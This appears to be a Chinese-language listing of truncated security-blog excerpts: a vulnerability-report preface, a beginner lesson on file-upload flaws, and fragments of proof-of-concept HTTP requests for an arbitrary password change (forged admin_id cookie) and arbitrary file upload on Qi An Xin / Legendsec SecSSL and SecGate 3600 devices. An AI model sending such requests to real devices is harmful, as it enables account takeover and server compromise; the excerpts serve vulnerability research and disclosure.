0x00 前言以下漏洞均已经上报漏洞平台,并且已经修复。请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本公众号及本人无关。0x01 描述看到某漏洞报告平台证书又上新了,还蛮好看的,这不得狠...
0基础入门代码审计-7 文件上传
0x01 漏洞描述文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种漏洞是getShell最快最直接的方法之一。0x02 审计要点1...
2023年hw公开的0day
1、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞POCPOST /changepass.php?type=2 Cookie: admin_id=1; gw_user_tic...
奇安信网神安全设备漏洞
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传POC POST /?g=obj_app_upfile HTTP/1.1 Host: x.x.x.x Accept: ...